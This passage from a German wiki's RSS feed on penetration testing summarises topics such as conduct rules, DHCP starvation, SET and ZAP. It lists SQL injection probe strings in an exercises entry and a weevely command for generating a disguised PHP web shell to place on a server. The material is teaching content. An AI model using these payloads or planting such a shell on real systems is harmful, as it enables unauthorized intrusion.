        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:start?rev=1755287408&amp;do=diff</link>
        <description>Pentester

Wie wird man Penetration Tester? Die 10 wichtigsten Fragen: &lt;https://www.digicomp.ch/blog/2021/12/01/penetration-tester&gt; 

... und ein Video: &lt;https://youtu.be/-JhR67m52FY&gt;

Verhaltensregeln

	*  Definieren was getestet werden darf
	*  Nicht ohne Genehmigung testen
	*  Integrität, alles an Sicherheitslücken melden und alle Vorkommnisse melden</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:starvation?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>starvation</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:starvation?rev=1755287408&amp;do=diff</link>
        <description>DHCP Starvation Attack

Als DHCP Starvation Attack wird ein Angriff auf ein Computernetzwerk bezeichnet, bei dem der gesamte Bereich verfügbarer und durch DHCP vergebener IP-Adressen auf einen einzigen Client registriert werden. Die automatische Zuweisung von Netzwerkadressen an andere Rechner wird so unmöglich gemacht.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:steganographie?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>steganographie</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:steganographie?rev=1755287408&amp;do=diff</link>
        <description>Steganographie

Bei der Steganographie geht es darum, eine geheime Nachricht so zu versenden, dass niemand außer dem gewünschten Empfänger die Existenz dieser Nachricht überhaupt vermutet. Der Begriff kommt aus dem griechischen und bedeutet in etwa</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:tool_list?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>tool_list</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:tool_list?rev=1755287408&amp;do=diff</link>
        <description>Explain use cases of the following tools during the phases of a penetration test

(**The intent of this objective is NOT to test specific vendor feature sets.)</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:tools?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>tools</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:tools?rev=1755287408&amp;do=diff</link>
        <description>Toolbox

...was man so in der Tasche haben sollte...

setoolkit: The social engineering Toolkit

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of time. These kind of tools use human behaviors to trick them to the attack vectors.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:uebung?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>uebung</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:uebung?rev=1755287408&amp;do=diff</link>
        <description>Übungen

Payload


1
1&#039;
1&quot;
[1]
1`
1\
1/*&#039;*/
1/*!1111&#039;*/
1&#039;||&#039;asd&#039;||&#039;
1&#039; or &#039;1&#039;=&#039;1
1 or 1=1
&#039;or&#039;&#039;=&#039;


TryHackMe

	*  Registrieren: &lt;https://tryhackme.com&gt;
	*  Voucher einlösen: &lt;https://tryhackme.com/profile&gt;
	*  Einführung: &lt;https://tryhackme.com/room/tutorial&gt; und &lt;https://tryhackme.com/path-action/introtocyber/join&gt;

Boson CompTIA PenTest+ Labs

The CompTIA PenTest+ (PT0-001) is an intermediate-to-advanced level certification to provide you with the hands-on skills of penetration testing (ethi…</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:weevely?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>weevely</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:weevely?rev=1755287408&amp;do=diff</link>
        <description>weevely

Mit weevely kannst du ein nettes Payload bauen:

weevely generate 12345 /root/Desktop/404.php

Dies baut eine php-Datei namens 404.php in den Ordner /root/Desktop/ mit dem Passwort 12345 

Dieses File so auf den Webserver kopieren das es erreichbar ist.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:wlan?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>wlan</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:wlan?rev=1755287408&amp;do=diff</link>
        <description>Wlan Pentest

	*  WLAN hacken: Beim „WLAN hacken“ geht es darum, sich Zugang zu einem gesicherten WLAN zu verschaffen, von dem man das Passwort nicht weiß. Beim WLAN-Hacking geht es in der Regel darum, das Passwort eines WLANs herauszufinden oder andere Schwachstellen zu finden.</description>
    </item>
    <item rdf:about="http://creutz.spdns.de/doku.php/edv:hacking:pentest:zap?rev=1755287408&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-08-15T19:50:08+00:00</dc:date>
        <dc:creator>Anonymous (anonymous@undisclosed.example.com)</dc:creator>
        <title>zap</title>
        <link>http://creutz.spdns.de/doku.php/edv:hacking:pentest:zap?rev=1755287408&amp;do=diff</link>
        <description>ZAP von Owasp

ZAP ist ein Open-Source-Sicherheitsscanner für Webanwendungen. Es ist eines der aktivsten Open Web Application Security Project-Projekte und hat den Flaggschiff-Status erhalten. 

Download unter: &lt;https://www.zaproxy.org/download/&gt;

Add repository and install manually. For xUbuntu 21.04 run the following:
Keep in mind that the owner of the key may distribute updates, packages and repositories that your system will trust (more information).</description>
    </item>
</rdf:RDF>
